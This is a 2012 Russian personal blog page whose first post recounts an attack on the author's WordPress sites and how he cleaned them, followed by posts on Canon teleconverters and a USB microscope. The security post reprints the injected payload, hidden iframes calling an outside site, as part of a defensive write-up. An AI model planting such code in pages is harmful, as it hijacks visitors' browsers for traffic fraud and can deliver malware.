http://evtifeev.com/8613-virusnyie-ataki-na-wordpress-i-joomla.html
Архив за месяц: Декабрь 2012
Навигация по записям
Вирусные атаки на WordPress (и Joomla)
6 декабря 2012 мой блог и другие мои сайты на том же хостинге подверглись вирусной атаке. В результате блог стал нерабочим и я его восстанавливал в течение 1 ночи.
Посколько блог в основном некоммерческий, то мне тем более неприятно тратить время не на собственно написание статей, а на борьбу с вирусами.
Потому я решил воспользоваться своим «оружием» и написать на эту тему статью, чтобы другим было легче бороться с этим вирусом и они могли повысить безопасность своей системы.
Итак...
«Вношу свои 2 копейки» в борьбу в вирусописателями и спамораспространителями
Бесплатная CMS WordPress плюсы и минусы
Плюсы WordPress
Вордпресс по данным Яндекса занимает лидирующие позиции среди бесплатных CMS по распространенности (Content Management System, Система Управления Данными).
Есть разные мнения почему ситуация такова, но поскольку блог мой, то я выскажу своё мнение, как в бывшем и программиста и сайтостроителя.
Всё дело в простоте. Вордпресс ставится максимально просто. Буквально в один клик мыши. Это большой плюс WordPress.
Если вы посмотрите на вторую диаграмму Яндекса, то увидите, что несмотря на бОльшую распространенность WordPress, эта система не лидер среди зараженных сайтов, а очень даже неплохо построена в плане безопасности. Другое дело, что «кто ищет — тот всегда найдет». И потому пока есть спрос на взлом этой CMS, отыскиваются и решения.
Особенно это касается популярных сайтов, но вобщем-то взломщики не чураются и личных небольших блогов и вообще не очень разборчивы.
Другой плюс WordPress в большом количестве бесплатных плагинов на любой вкус. Сделать можно почти все с помощью плагинов или докупить — дописать любые необходимые.
Третий плюс и он касается в частности безопасности — частые обновления системы. Если вы регулярно обновляете движок WordPress, то вероятность вашего взлома сильно уменьшается, так как разработчики оперативно «латают дыры» в движке. Это не 100% защита, но мы всегда оперируем вероятностями в реальном мире.
Минусы WordPress
Все популярные системы как сладкий десерт для взломщиков. Чем популярнее, тем лучше. В частности, потому так много вирусов для Windows и мало, скажем, для MacOS.
БОльшая часть вирусописателей стимулируется возможным размахом проекта или денежным стимулом. Потому так интересно сломать сразу десятки тысяч сайтов, а не 1шт.
Значит самая популярная система под наибольшим ударом. Как всегда решение простое — пишите свою систему сами и вряд кто станет возиться с вашей уникальной системой. Им просто будет жалко своего времени взламывать один конкретный сайт.
Еще раз: взломщики берут размах сразу на десятки тысяч сайтов. Почему — читайте ниже.
Второй минус системы — в её плюсе. Обратная сторона большого количества плагинов — возможность встраивания в них вредоносного кода. Надо сказать, разработчики WordPress убирают из репозитория те зараженные плагины, которые находят или на которые есть жалобы. Даже если в них встроен просто рекламный код, который не объявлен явно или зашифрован.
Тем не менее такие плагины редко, но встречаются и они получают доступ ко всей вашей системе.
Третий минус в набивании системы плагинами и снижении скорости движка из-за этого. Система WordPress очень гибкая, но у нее еще нет массы настроек. Все предусмотреть сложно и такие вещи как где загружать плагин она оставляет на совести разработчиков плагинов. А те особо не заморачиваются и загружают свой плагин просто везде. На каждой странице и записи. Потому если вы посмотрите любую страницу своего сайта/блога, то увидите, что его страницы уже набиты подрузкой java-скриптов и стилей, которые не нужны на конкретно этой странице. Все это существенно тормозит систему.
Если к вам встраивается вирус, то он задействует еще сторонние ресурсы и скорость падает еще больше.
Зачем злоумышленникам ломать ваш блог/сайт
Вы думаете, что вы не настолько значительны, что на вас просто не обратят внимание. Но дело в том, что тот кто вас будет ломать тоже не гуру хакерства, а вполне обычный хакер-неудачник, который не смог себя пристроить в области созидания полезного программного продукта. Пентагон ему тоже не дался. Потому он пытается сам себе доказать, что он не настолько плох и может испортить несколько десятков тысяч вполне себе беззащитных блогов. Тем более это принесет какие-то деньги. А ведь именно такие и ломают. Ситуация как с автомобилями. Скорее сломают посещаемый и плохозащищенный сайт, нежели малопосещаемый, но хорошо защищенный.
Итак, какую пользу может извлечь злоумышленник из взламывания вашего сайта? Первую и очевидную (поскольку он по-совместительству псевдо-SEO-оптимизатор) это накрутка счетчика стороннего ресурса. А как еще вы думали выводят сайты в топ10 Яндекса 20-летние оптимизаторы? Вы же не думали, что у сайта вашей небольшой фирмы столько заинтересованных посетителей? И как, опять же, вы думали выводят в топ10 почти любого? Неужели вы думаете, что потребилем одинаково супер-интересны любые товары?
Заказывая такую услугу, нужно понимать, что вам только пустят пыль в глаза. Вся идея в том, что в захваченные блоги и сайты, подконтрольные взломщику, встраивается код, который в окошке 1×1 пиксель (его не видно) загружает ваш сайт. Оттого счетчик вашего сайта взлетает на неимоверную высоту. Яндекс видит, что на вас ссылаются со всех уважаемых популярных сайтов со всех их страниц и тоже выводит вас в первые строчки. А на самом деле люди приходящие на популярные сайты само собой даже никогда не увидят ваш сайт.
Потому деньги вы заплатите «за воздух». За эфимерных поситителей, которых на самом деле никогда не было.
Ну и вложите свои средства в развитие этой подпольной индустрии. Глядишь в скором будущем сами будете взломаны и использованы для накрутки счетчика другой небольшой фирмы.
Вторая причина взлома — размещение рекламы. Почти всегда, если вас взломали и у вас есть уникальные статьи или бесплатный софт — у вас это скачают. Они часто сливают базы с помощью специальных скриптов наподобие mysql dumper и подобных. Такими можно слить базу в течение пары минут.
После этого взломщик устанавливает вордпресс на свой хостинг и закачивает вашу базу с кучей ценных статей. К нему цепляет платную рекламу и собирает небольшие деньги. А ему и не нужно быть заметным. Он берёт своё числом взломанных сайтов.
При количестве взломанных сайтов, исчисляющихся десятками тысяч на одного взломщика, доход может быть весьма значительный. Это еще покруче стоковой фотографии. Вот только продукт делает не он сам, а крадёт у других. Пример для фотографов — представьте, что вы крадёте (не дай бог) фотографии известных и популярных фотографов и продаёте их на стоках. Правда проще, чем самому снимать?
Но это не этично и противозаконно.
Этичность и законность взлома
Законность взлома сайта
В нашем мире есть масса средств пополнить свой карман. От простых до сложных. От этичных до не этичных.
Планку порядочности и способ заработка каждый выбирает себе сам.
Осуждать конкретный способ может или общество или отдельный человек (что субъективно).
Государство — машина неповоротливая и часто прыгает из крайности в крайность. Чаще в крайности запретов всего и вся, если мы говорим о нашей Родине.
Но при некоторых живодерских методах защиты корпоративной собственности оно почти не принимает участия в защите частной некоммерческой собственности. Какая ему с этого выгода?
Гораздо выгоднее защищать кинокомпании и майкрософт. Это и понятно. На выгоде строится весь современный мир. Но на самом деле далеко не весь, как бы это не пропагандировало само государство.
Итак, считайте, что для вас законов о защите вашего сайта нет и быть не может. Пока не разбогатеете.
Этичность взлома сайта
Этично воровать карманные деньги у детей? Этично у старушек отнимать пенсии?
Каждый для себя решает вопрос такой сам в меру своей порядочности.
Если ты такой хороший хакер, помоги стране, взломай что-то существенное... сам знаешь что.
Людей, которые работают за еду или очень дешево, в США называют bottomfeeder'ы (по-нашему «питающиеся со дна»).
Зачем им уподобляться?
Что это за традиция ломать личные блоги и некоммерческие проекты?
Я не очумелый сторонник авторского права, понимаю «пиратов». Но одно дело, когда ты имеешь дело с гигантскими корпорациями и другое дело, когда ты создаешь проблемы конкретным отдельным людям. А тем более проблемы с доступом к свободной и бесплатной инфомации. Ты еще Википедию сломай, вот там-то «золотое дно».
Про конкретный вирус и как его лечить
Признаки взлома
Прошу обратить внимание, что признаки актуальны для текущей версии вируса. Его могут впоследствии улучшить.
Во-первых на ipad сбилась кодировка и стала лезть абракадара, вкупе с ошибками запросов mysql.
На большой компьтере все выглядело менее заметно — просто над шапкой сайта вылезала одна ошибка mysql, но зато с запросом на вражеский сайт.
На хостинге в корне обнаружилась папка mysql_dumps с базами mysql, которые злоумышленник слил.
По ошибке запроса я обнаружил степень поражения — полная. Все файлы index.php, home.php и index.html моего хостинга.
Кстати, не забудьте сменить пароль FTP сразу, как обнаружите заразу и заблокировать сайт простой записью в файле .htaccess:
Deny from all
Будьте уверены, бдительный Гугл уже поставил вам статус «Вредоносный сайт» и разослал уведомления во все известные антивирусы.
История взлома
Итак, вирус проник скорее всего с помощью кражи моего фтп-пароля. Значит он сначала заразил мой компьютер и отослал мой фтп-пароль злоумышленнику.
Такой вывод я делаю из того, что злоумышленник слил _все_ базы со всех блогов WordPress моего хостинга.
После чего особо не разбираясь он прогнал скрипт по блогам, встроив во все Html файлы index.html такой код:
Код для Html
<html><body onload = "<iframe name=;<iframe name="SagUTeXYne" src="http://zaragaz.ru/kvas.php" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>"SagUTeXYne" src="http://zaragaz.ru/kvas.php" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>"</body></html>
Для PHP файлов блога index.php и home.php он приберёг чуть другой код.
Код для Php
<iframe name="SagUTeXYne" src="http://zaragaz.ru/kvas.php" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>
Что делает вирусный код
Этот код грузит чужой сайт в невидимом окне 1×1пикс, накручивая ему счетчик. Как видите, на этот раз это сайт zaragaz.ru (не ходите туда, не накручивайте дополнительно им счетчик. и мало ли что там еще есть из «подарков»), но мог быть и любой другой. Я посмотрел по поиску — он рекламирует таким способом многие небольшие сайты. Дурит им голову.
Как лечить ваш блог WordPress от этой заразы
Есть скрипт, написанный на PHP (сначала я хотел сам написать, но по поиску нашлось готовое решение), который ходит рекурсивно по директориям и ищет указанный код. Код этот аккуратно вырезает.
В моём случае было около 60 зараженных файлов в разных директориях, так что вручную чистить я бы замучился.
Можно было скачать к себе на компьютер и чистить здесь, но скриптом намного проще, без скачивания.
Я разделил код на 2 файла, тк в Html и Php файлах немного разные вставки. Один скрипт идёт только по html файлам рекурсивно и ищет один код, а другой идёт только по php и ищет другой код.
Можно было дописать, чтобы работало из одного файла, ну да ладно. Кому надо — допишет сам.
Код лечения для Html
[download id=85]
Код лечения для Php
[download id=86]
Ключевым показетелем заражения данным вирусом будет наличие кода с iframe и ссылкой на чужой сайт в файлах, как я описал выше.
Свой конкретный код (у вас скорее всего будет ссылка на другой сайт, другого его клиента) вы можете легко поменять в коде скрипта — там все очень понятно.
Кидаете оба скрипта в корень вашего блога в запускаете:
http://вашсайт/delvir-html.php
http://вашсайт/delvir-php.php
Скрипты отработают бысто, выдадут на экран список файлов по которым прошлись. В самом конце будет написано сколько зараженных файлов вылечено.
Итог
Несмотря на то, что полностью защищенным считать себя нельзя никогда, все-таки рекомендую обновить ваш движок вордресс до последней версии и обновить вашу тему до последней версии. Там меньше всего будет дырок для узлоумышленника. И не будьте столь неосмотрительны как я — держите антивирус постоянно включенным. Мне помогал Dr.Web, я но я его выгружаю, чтобы не тормозил компьютер. На этот раз все последствия не исправить тк никто уже мне базу не вернет. Теперь она в руках вредителя. И никто не даст гарантии, что он не растиражировал её тысячей экземпляров и не снижает таким образом рейтинг моего блога, набивая себе карман.
Также полезная анти-троянская программа Malwarebytes' Anti-Malware.
Есть еще куча правил как поддерживать безопасность на своём блоге, но это я оставлю настоящим админам.
Мой вывод — лучше иметь свою уникальную систему. Этот вывод подтверждался неоднократно. Но это долго или относительно дорого, если заказывать.
Кстати, хороший пример качественной системы написанной для конкретного проекта — http://lens-club.ru
И быстрая и смотрю не особо страдает от вирусов, хотя и весьма посещаема.
Так что желаю вам написать систему для своих личных нужд!
И удачных вам безвирусных сайтов! :) А мой блог продолжил пока работать в штатном режиме.
Если в ближайшие дни будут какие-то небольшие сбои с плагинами, знайте, я работаю над безопасностью для нашего общего блага.
Евтифеев Дмитрий
Телеконвертеры Canon и для Canon
Накопились вопросы читатей по телеконвертерам, потому я решил написать небольшую статью.
Что такое телеконвертер
Телеконвертер — блок с линзами, который помещается между объективом и камерой, увеличивая фокусное расстояние объектива на заявленное значение (в N раз).
В большинстве случаев значения увеличения составляют 1.4x и 2x. Т.е. фокусное вашего объектива увелчивается в указанное количество раз, а светосила объектива падает соответственно при 1.4x на 1стоп, а при 2х на 2 стопа.
Для Canon родные телеконвертеры это:
Extender EF 1.4X II
Extender EF 2X II
Extender EF 1.4X III
Extender EF 2X III
Неродные телеконвертеры для Canon
Kenko, Tamron, Sigma
Как выражается падение светосилы?
Во-первых темнеет в видоискателе. Во-вторых при применении телеконвертера 1.4х ваш 135/2.8 превращается в 190/4 (темнее на 1 стоп). А при применении телеконвертера 2х он превращается в 270/5.6 (темнее на 2 стопа).
Важно в данном случае знать, что при достижении F8 у вас скорее всего перестанет работать автофокус, так как автофокус Canon не рассчитан на работу с такими «тёмными» объективами.
Маленькая хитрость есть в том, что обманув камеру и поставив неродной телеконвертер можно заставить автофокус работать (плохо работать) и после F8.
Так, например, если мы возьмем и без того очень хороший макрообъектив Canon EF 180/3.5L, который даёт увеличение до 1:1 и поставим его через 2х телеконвертер, то мы получим 360/7 дающий нам макро 2:1!
Какие были сделаны усовершенствования в последних телеконвертерах Canon Extender EF 1.4X III, Extender EF 2X III
Историческая справка
Canon Extender EF 1.4X — выпущен в ноябре 1988г.
Canon Extender EF 2X выпущен в октябре 1987г.
Canon Extender EF 1.4X II, Extender EF 2X II — сентябрь 2001-ого
Canon Extender EF 1.4X III, Extender EF 2X III — февраль 2011-ого
Оптическая схема Canon Extender EF 1.4X изменилась: из 5 элементов в 4-х группах стало 7 элементов в 3-х группах.
Как видите, двухкратный экстендер тоже существенно изменился внутри.
Графики MTF телеконвертеров Canon
2X — старый двухкратный телеконвертер (1987г.)
2X II — 2001г.
2X III — 2011г.
Реальные графики смотрим только по серым линиям, они даны для максимально открытой диафрагмы. Голубые линии для диафрагмы F8 и имеют несущественное значение для теста.
По графикам создается впечатление, что в последних версиях телеконвертера Canon совершил небольшое чудо. Но если вы будете внимательны, то заметите, что тестовый объектив тоже сменил ревизию. Он тоже стал намного лучше, так что график показывает, что новый конвертер лучше, но насколько? Маркетологи Canon нас избавили от прямого сравнения, как неосмотрительно делалось раньше.
Насколько падает качество изображения при использовании телеконвертера
Вопрос индивидуальный не только для разных телеконвертеров, но и для разных экземпляров одного телеконвертера. Вообще в телеконвертере достаточно много линз, чтобы существенно повлиять на фото, усиливая ХА.
Начнём с того, что Extender EF 1.4X II и Extender EF 2X II были выпущены в далёком 2001-ом году, так что у Canon было время поработать над усовершенствованием своих телеконвертеров.
Extender EF 2X II
Extender EF 2X III
Чтобы улучшить ситуацию, как и в случае с большинством других объективов достаточно прикрыть диафрагму. Это сделает разницу в качестве изображения между объективом без телеконвертера и с телеконвертером менее заметной.
Как видите, Canon проделал большую работу над ошибками и новый телеконвертер значительно лучше и стоит своих денег.
Совместимость телеконвертеров с объективами Canon
Если вы вдруг предположите, что телеконвертеры Canon будут работать на всех объективах Canon, то будете сильно неправы. Исторически телеконвертеры Canon работают только с объективами от 135мм фокусного расстояния и большим. Это связано с выступающим передним элементом, который имеется на фирменных телеконвертерах Canon.
Список совместимых объективов Canon с родными телеконвертерами
К «родным» телеконвертерам можно отнести и телеконвертеры Sigma. Не по причине их особо сильной совместимости, а по причине наличия выступающего переднего элемента. Т.е. в плане совместимости телеконвертер Sigma не даст нам особых выигрышей.
Заявлена совместимость с такими объективами Canon:
200mm f2.8L USM — AF
300mm f2.8L USM — AF
300mm f4.0L IS — MF
400mm f2.8L USM — AF
400mm f5.6L USM — MF
500mm f4.5L USM — MF
600mm f/4L — MF
70-200mm f2.8L USM — AF
А вот кто нам даст бОльшую совместимость в плане количества возможных объективов, так это телеконвертеры от Kenko.
Только я модели вам сейчас конкретные не называю, если будет интересно, спросите про это отдельно.
Однако, должен упомянуть, что телеконвертеры Kenko хуже оптически и автофокус у них работает только до F2.8 (на Kenko x2, в отличие от родных, где автофокус работает до положенных F8. На Kenko 1.4x до F4 уверенная работа АФ заявлена).
Это особенно актуально, если вы вспомните, что светосила вашего объектива упадет на 2 стопа при использовании с двухкратным телеконвертером. Таким образом на телеконвертере 2x Kenko автофокус будет работать только на объективах со светосилой не ниже F1.4.
Иллюстрация падения светосилы объектива
Телеконвертеров названных фирм у меня под рукой не оказалось, так что я использовал советский ТК-2М (двухкратный телеконвертер на резьбу М42), который у меня лежит как раз для таких учебных целей.
У моего Юпитер-37А, видимо, немного сбита диафрагма, поэтому на F11 получился некоторый пересвет (установка по флешметру, на объективе Canon все ок). Но он нам даже на руку, чтобы хоть как-то было видно второе фото, снятое с установленным телеконвертером.
Для кого предназначен телеконвертер
Что такого нам даёт телеконвертер? Почему не использовать обычный объектив?
Всё очень просто и как часто бывает упирается в стоимость. Обычный хороший телеобъектив будет стоить намного дороже, чем телеконвертер и при близких характеристиках он еще и экономит место в сумке.
Приведу пример из жизни.
Мне нужен масштаб изображения больше в кадре, чем даёт мой Canon EF 100-400/4.5-5.6L при съемке птиц и Луны. Более длиннофокусный телеобъектив стоит больших денег.
Значит у меня есть выбор — или купить дорогущий телевик за 200-300 тыс.руб. или купить телеконвертер Canon EF 2x III за 15тыс.руб.
Вроде разница в стоимости решений очевидна?
Хороший был бы пример с Canon EF 100/2.8L + телеконвертер Canon EF 2x III для увеличения масштаба изображения и как альтернатива старому Canon EF 180/3.5, но на него родные телеконвертеры не встают!
Надеюсь эта статья поможет вам определиться с тем, сделать ли выбор в пользу телеконвертера или все же накопить на идеальный вариант — дорогой объектив.
Удачи вам и удачных снимков!
Портативные цифровые микроскопы и фотография
Сегодня такая странная тема для блога, посвященного преимущественного фотографии, но я сейчас объясню связь.
Дело в том, что многие современные микроскопы позволяют подсоединять их к компьютеру и делать фото. Микроскоп+фото и получается макросъемка. То устойство, о котором я хочу рассказать сложно отнести к какой-то определенной категории.
Про мои предыдущие эксперименты можно почитать на этой странице «Макросъемка — теория и практика»
Вообще системы на основе связки микроскоп+фотокамера существовали уже очень давно, просто сейчас стало возможно приобрести сильно увеличивающее устройство задешево.
Итак, товарищи хитрые американцы совместили мини-видеокамеру с макрообъективом и крошечным цифровым сенсором.
Тут же у них изделие было скопировано «трудолюбивыми» китайцами и рассматривать мы будем уже только его. Американский аналог я в руках не держал по причине его дороговизны.
Заявленные технические характеристики микроскопа
— увеличение от 20х до 800х (2 Мпикс)
— светодиодная подсветка
— подключение под USB, видеозапись и снимки
— металлический стенд
Проверим, что мы можем получить от данного микроскопа.
Для наглядности сфотографирую вместе объекты съемки. Размер карточки SD всем известен, а рядом сингапурские 50 центов.
Сначала поснимаем на небольшом увеличении (<20х).
Теперь переключаем на увеличение 20х
Увеличение 20х
Вижу, что разрешение стремительно падает. Т.е. похоже, что 20х на самом деле интерполированное «увеличение чуть меньше 20х».
Из чего следует, что нужно снимать как раз на этом «чуть меньше». Оно вполне приемлимое в плане увеличения и разрешения снимков.
На нем и нужно инспектировать печатные платы.
Но идём дальше. На заявлено плавное увеличение от 20х до 800х, но, «чудесным образом» мы не имеем всех этих промежуточных значений по причине смещения фокуса внутрь пластикового защитного колпачка (будем называть его далее блендой).
При вращении кольца значений увеличения, объектив находящийся внутри постепенно выдвигается наружу и точка фокусировки тоже выдвигается наружу. Таким образом на 800х мы уже имеем возможность фокусироваться на расстоянии около 2-3мм от «бленды».
Увеличение 800х
Светло-зеленое плетение это и есть начало надписи Razer.
Видно значительное увеличение, но и дальнейшее падение разрешения.
В другом месте экрана, где другой цвет (серый)
Бонус
Выводы
Этот «микроскоп» довольно интересная игрушка.
Оставим на китайской совести заявление про 2 Мпикс и 800 крат увеличения. Тем не менее этот портативный микроскоп (питается от порта USB) увеличивает все-таки довольно сильно и во многих случаях может оказаться полезен, особенно учитывая встроенную подсветку из светодиодов (2 режима яркости + отключение подсветки).
По ходу тестирования я сделал вывод, что микро-стенд прилагающийся в комплекте не особо полезен, удобнее подбирать фокус рукой, варьируя расстояние до объекта съемки. Делать это на 800х (хоть там и не 800) весьма проблематично, потому рекомендую использовать макрорельсы. Я просто поленился их использовать тк пришлось бы идти в студию.
Снимал я в основном в разрешении 1024×768 так как бОльшие разрешения мне показались интерполированными и не дающими новых деталей. Может я неправ — желающие попробуют сами.
Если данный микроскоп использовать с макрорельсами, то весьма вероятно получить более-менее приличный снимок объекта размером в 3мм. Так, чтобы он занимал в кадре 70-80%. Для юных биологов с ноутбуком — вещь незаменимая :)
Теперь о нюансах. Китайцами данный прибор поставляется «as is», т.е. без инструкции и софта захвата. Только драйвер. Сначала меня это несколько покоробило, но на то и русский человек... Довольно быстро нашёл подходящий софт. Можно захватывать кадры до 5мпикс, делать видео и измерения объектов в кадре.
В замешательство поставил пока только один момент. Измерения можно делать зная кратность увеличения микроскопа. Но из-за мухлежа китайцев кратность непонятна. В программе можно поставить максимальную кратность в 400х. Думаю, более и не понадобится. Чтобы выяснить реальное увеличение, нужно замерить известный по размеру объект. Можно линейку. Дерзайте!
А если у кого был интересный опыт работы с микроскопами — будет интересно почитать ваши комментарии!
Данный цифровой микроскоп можно приобрести у меня в магазинчике